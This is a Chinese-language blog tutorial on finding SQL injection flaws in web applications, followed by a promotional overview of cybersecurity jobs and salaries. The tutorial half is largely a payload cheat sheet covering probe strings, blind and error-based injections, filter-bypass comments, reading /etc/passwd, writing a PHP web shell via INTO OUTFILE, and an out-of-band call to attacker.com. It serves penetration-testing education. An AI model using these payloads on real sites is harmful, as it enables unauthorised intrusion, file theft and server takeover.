web漏洞挖掘方法 - sql注入篇，零基础入门到精通，收藏这篇就够了

本文链接：https://blog.youkuaiyun.com/Javachichi/article/details/144657811

注入检测

在这里插入图片描述

常见的注入点

GET/POST/PUT/DELETE参数：常见的注入点，通常会尝试在HTTP请求的参数中注入SQL命令。``如：http://xx.com/product.php?id=12' OR 1=1 --``X-Forwarded-For：HTTP头部字段，通常用于伪造IP地址，但也可以用于注入SQL或XSS。``如：X-Forwarded-For: 192.168.1.1' OR 1=1 --``文件名：尝试通过文件上传或者文件路径访问时进行注入。

判断注入点

如：http://xx.com/product.php?id=12/(在这里添加判断)``   ``'：单引号，常见于字符串插入的地方，尤其是SQL注入。``/：斜杠，可能用于路径遍历、注入等。``"：双引号，常用于字符串拼接。``1/1：常用于测试SQL注入的效果，1/1返回真。``1/0：常用于测试除零错误，触发数据库报错。``and 1=1：常见的SQL注入测试条件，通常返回真，确认注入是否成功。``" and "1"="1：类似于``and 1=1，用于测试注入成功与否。``and 1=2：尝试返回假的条件（例如，1=2为假），验证是否会导致不同的行为。``or 1=1：另一种常用的条件判断，若数据库返回成功则说明注入可行。``or 1=：同样是一个条件，可能会触发SQL查询错误。``' and '1'='1：注入测试，验证条件是否返回真。``+：加号可能用于URL编码或者SQL中拼接字符串。``-：减号，用于注释掉SQL中的后续部分。``^：异或运算符，有时用于绕过过滤或触发错误。``*：星号，可能用于选择所有字段，或作为乘法运算符。``%：百分号，可能用于SQL模糊匹配或URL编码。``/：除号，常用来触发除零错误等SQL注入。``<<, >>：左移右移位操作符，可能用于绕过过滤或触发错误。``||：逻辑或操作符，用于组合多个条件。``|：按位或操作符，可能用于SQL注入或绕过过滤。``&：按位与操作符，常用于某些SQL注入攻击。``&&：逻辑与操作符，组合条件判断。``~：按位取反操作符，有时用于SQL注入。``!：逻辑非操作符，常用于条件判断。``@：在某些数据库中用作变量前缀，或用于其他目的。

注入分类

经典SQL注入：在输入字段中注入恶意的SQL查询语句，例如：' OR 1=1 --，绕过身份验证，返回所有记录。``盲注（Blind SQL Injection）：``布尔盲注：通过观察页面响应是否变化来推测数据库的内容，例如：' AND 1=1 -- 和 ' AND 1=2 --。``时间盲注：通过观察数据库响应延迟来判断查询的真假，例如：' AND SLEEP(5) --。``联合查询注入（Union-based SQL Injection）：使用UNION SELECT来合并多个查询，尝试获取数据库中的其他表数据。``报错注入（Error-based SQL Injection）：通过生成SQL错误，泄露数据库结构信息。

Mysql 中常用的函数

version():查询数据库的版本``user():查询数据库的使用者``database():数据库``system_user():系统用户名``session_user():连接数据库的用户名``current_user():当前用户名``load_file():读取本地文件``@@datadir:读取数据库路径``@@basedir:mysql安装路径``@@version_complie_os:查看操作系统``@@version：SQL查询常见的数据库版本信息。``@@servername：SQL查询数据库服务器名称。``@@language：SQL查询当前数据库语言设置。``@@spid：SQL查询当前会话ID（进程ID）。

测试列数

例如` `http://xx.com/index.asp?id=12+union+select+null,null-- ，不断增加` `null 至不返回

报错注入

http://xx.com/product.php?id=12 and select 1/0：用来触发除零错误，从而可以获取数据库错误信息，帮助推测数据库类型。``http://xx.com/product.php?id=12 and *select 1 from (select count(*), concat(version(), floor(rand(0)2))x from information_schema.tables group by x)a：通过查询数据库信息并触发错误来暴露数据库版本信息。``http://xx.com/product.php?id=12 and extractvalue(1, concat(0x5c, (select user())))：利用XML函数extractvalue来注入并获取数据库用户信息。``http://xx.com/product.php?id=12 and updatexml(0x3a, concat(1, (select user())), 1)：类似于extractvalue，用于从XML中提取数据。``http://xx.com/product.php?id=12 and exp(~(SELECT * from(select user())a))：通过调用exp函数触发错误并获取数据库用户信息。``http://xx.com/product.php?id=12 and ST_LatFromGeoHash((select * from(select * from(select user())a)b))：利用空间数据函数进行注入。

基于geometric的报错注入

http://xx.com/product.php?id=12 and GeometryCollection((select * from(select * from(select user())a)b))：触发错误信息并通过几何类型函数获取用户信息。``http://xx.com/product.php?id=12 and polygon((select * from(select * from(select user())a)b))：同样触发错误，通过polygon函数。``http://xx.com/product.php?id=12 and multipoint((select * from(select * from(select user())a)b))：几何类型函数的一种。``http://xx.com/product.php?id=12 and multilinestring((select * from(select * from(select user())a)b))：几何类型函数，用于注入。``http://xx.com/product.php?id=12 and LINESTRING((select * from(select * from(select user())a)b))：几何类型函数之一，用于注入。``http://xx.com/product.php?id=12 and multipolygon((select * from(select * from(select user())a)b))：几何类型函数，用于注入。

其中需要注意的是，基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复，在5.5.x较后的版本中同样不再生效。

堆叠注入

http://xx.com/product.php?id=12 and ;select 1：使用分号（;）来结束当前查询并开始新的查询。

注释符

如：http://xx.com/product.php?id=12#``#：注释符，SQL中用来注释掉后续的语句。``--+：SQL注释符，``--用于注释，``+可绕过某些过滤器。``/xxx/：块注释，SQL注释的一种形式。``/!xxx/：条件注释，仅在特定版本的MySQL中生效，通常用于版本差异化操作。``/!50000xxx/：MySQL特定版本支持的注释格式，通常用于绕过过滤。

判断过滤规则

是否有trunc：检查是否存在截断字符。``是否过滤某个字符：检查是否有过滤掉特定字符，如单引号、双引号等。``是否过滤关键字：检查是否有过滤掉SQL关键字，如select, union, insert等。``slash和编码：检查是否需要对斜杠或字符进行编码或转义。

获取信息

判断数据库类型``and exists(select * from msysobjects) > 0：针对Access数据库。``and exists(select * from sysobjects) > 0：针对SQL Server数据库。``判断数据库表``and exists (select * from admin)：检查是否存在admin表，用来验证表名。``确定字段数``Order By：常用于通过排序获取不同字段数目，帮助注入者确认表的列数。

测试权限

读敏感文件：测试是否能够读取敏感文件，如/etc/passwd（类Unix系统）、Windows系统中的boot.ini等。``http://xx.com/product.php?id=12' UNION SELECT load_file('/etc/passwd') --``   ``写shell：测试是否能够上传并执行恶意脚本（shell）。``http://xx.com/product.php?id=12' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' --``   ``文件操作：测试是否能够对文件进行修改或删除操作。``http://xx.com/product.php?id=12' UNION SELECT "<?php echo 'Hello'; ?>" INTO OUTFILE '/var/www/html/hello.php' --

网络请求

带外通道：使用HTTP请求、DNS请求、SMTP等协议发送数据，从而建立与攻击者的通信通道。``http://xx.com/product.php?id=12' UNION SELECT load_file('http://attacker.com/shell.txt') --

计算机热门就业方向

从目前市场情况来讲，网络安全的就业前景是非常不错的，2022年的统计数据，网络安全专业的缺口已经增长到140万人。

1、就业岗位多，发展方向广

①就业环境：网络安全可以在计算机科学与技术、信息通信、电子商务、互联网金融、电子政务等领域从事相关工作，还可以在政府机关事业单位、银行、保险、证券等金融机构，电信、传媒等行业从事相关工作。

②就业岗位：网络安全工程师、渗透测试工程师、代码审计工程师、等级保护工程师、安全运维工程师、安全运营工程师、安全服务工程师等。

2、薪资待遇可观，提升较快

作为一个新兴行业，网络安全人才的市场需求远远大于供给，企业想真正招到人才，就必须在薪酬福利上有足够的竞争优势。因此，网络安全领域的薪资近年来也呈现稳步增长的态势。

根据工信部发布的《网络安全产业人才发展报告》显示，网络安全人才平均年薪为21.28万元，整体薪资水平较高。数据显示，网络安全人才年薪主要集中在10-20万元，占比40.62%，与往年持平；其次是20-30万元，占比为38.43%，较2020年占比19.48%有显著提高；而年薪在10万以下人才占比由2020年的19.74%下降至2022年的9.08%。由此可见，网络安全行业作为新兴赛道，尚在快速发展阶段，从业人员薪资水平提升较快，也显示出网络安全行业相对更重视人才留存。

3、职业发展空间大

从网络安全专业学习的主要内容来看，包括linux运维、Python开发、渗透测试、代码审计、等级保护、应急响应、风险评估等。可见该网络安全专业的技术性很强，具有鲜明的专业特点，是一门能够学到真正技术的工科类专业之一。

因此，在职业发展上，网络安全专业除了就业岗位众多之外，由于专业技术性较强，在工作单位将处于技术核心骨干地位，职业发展空间很大。

盘点网络安全的岗位汇总

0****1

岗位一：渗透测试工程师

**岗位释义：**模拟黑客攻击，利用黑客技术，挖掘漏洞，提出修复建议。有些大厂，例如奇安信，甚至会将渗透岗位分为红蓝两方，对候选人的技术要求比较高，大部分刚入行的新人，也将渗透岗位作为后期的发展目标。

岗位职责：

负责对客户网络、系统、应用进行渗透测试、安全评估和安全加固
在出现网络攻击或安全事件时，提供应急响应服务，帮助用户恢复系统及调查取证
针对客户网络架构，建议合理的网络安全解决方案

**工作难度：**5颗星

薪资现状：

0****2

岗位二：安全运维工程师

**岗位释义：**维护网络系统的正常、安全运行，如果受到黑客攻击，则需要进行应急响应和入侵排查安全加固。很多刚毕业入行的新人，基本都从运维做起。

岗位职责：

日常终端维护，操作系统安装加固
完成网络安全设备故障排查、处置
完成相关管理制度文档的编写和提交

**工作难度：**3颗星

薪资现状：

0****3

岗位三：安全运营工程师

**岗位释义：**在运维的基础上，高效可持续地不断提升企业的安全防御能力。

岗位职责：

负责监控、扫描等各类安全策略的制定和优化
负责信息安全事件的应急响应
参与网络安全评估工作、安全加固工作和监控等等

**工作难度：**3颗星

薪资现状：

0****4

岗位四：安全开发工程师

**岗位释义：**顾名思义，对安全产品及平台、策略等进行开发工作。

岗位职责：

负责网络安全产品的系统技术设计、代码开发与实现、单元测试、静态检查、本地构建等工作；
参与公司其他产品的系统技术设计以及研发工作。

**工作难度：**5颗星

薪资现状：

0****5

岗位五：等保测评工程师

**岗位释义：**等保测评也叫等级保护测评，主要负责开展信息安全等级保护测评、信息安全风险评估、应急响应、信息安全咨询等工作。

岗位职责：

网络安全等级保护测评项目实施；
Web渗透测试、操作系统安全加固等安全项目实施配合

**工作难度：**3颗星

薪资现状：

0****6

岗位六：安全研究工程师

**岗位释义：**网络安全领域的研究人才。

岗位职责：

跟踪和分析国内外安全事件、发展趋势和解决方案
承担或参与创新型课题研究
参与项目方案设计，组织推动项目落实，完成研究内容、
负责网络安全关键技术攻关和安全工具研发

**工作难度：**5颗星

薪资现状：

0****7

岗位七：漏洞挖掘工程师

**岗位释义：**主要从事逆向、软件分析、漏洞挖掘工作

岗位职责：

通过模拟实施特定方法所获得的结果，评估计算机网络系统安全状况；
通过特定技术的实施，寻找网络安全漏洞，发现但不利用漏洞。

**工作难度：**5颗星

薪资现状：

0****8

岗位八：安全管理工程师

**岗位释义：**负责信息安全相关流程、规范、标准的制定和评审，负责公司整体安全体系建设。

岗位职责：

全业务系统网络安全技术体系的规划和建设，优化网络安全架构；
负责网络安全相关流程、规范、标准的指定和评审，高效处置突发事件；
负责网络安全防护系统的建设，提升网络安全保障水平；

**工作难度：**4颗星

0****9

岗位九：应急响应工程师

**岗位释义：**主要负责信息安全事件应急响应、攻击溯源、取证分析工作，参与应急响应、攻击溯源、取证分析技术的研究，提升整体重大信息安全事件应急处置能力。

岗位职责：

负责信息安全事件应急响应、攻击溯源、取证分析工作；
对安全事件的应急处置进行经验总结，开展应急响应培训；
负责各业务系统的上线前安全测试（黑盒白盒）及渗透测试工作；
参与应急响应、攻击溯源、取证分析技术的研究，提升整体重大信息安全事件应急处置能力。
跟踪国内外安全热点事件、主流安全漏洞、威胁情报、黑灰产动态并进行分析研究，形成应对方案；

**工作难度：**4颗星

薪酬现状：

岗位十：数据安全工程师

**岗位释义：**主要对公司的数据安全的日常维护和管理工作，确保公司数据安全。

岗位职责：

负责数据安全日常维护和管理工作，包括数据安全审核、数据安全事件的监控与响应、安全合规的审计与调查等；
负责数据安全标准规范的制定和管理，包括数据安全需求识别、风险分析、数据分级分类、数据脱敏、数据流转、泄露防护、权限管控等；推进相关安全管控策略在平台落地、执行。
负责开展与数据全生命周期管理有关的各项数据安全工作;
负责跨平台、跨地域数据传输、交互等数据安全方案制定与落地
定期组织开展数据安全自评工作，发现潜在数据安全风险，制定相应的管控措施，并推进落实整改。

**工作难度：**4颗星

薪酬现状：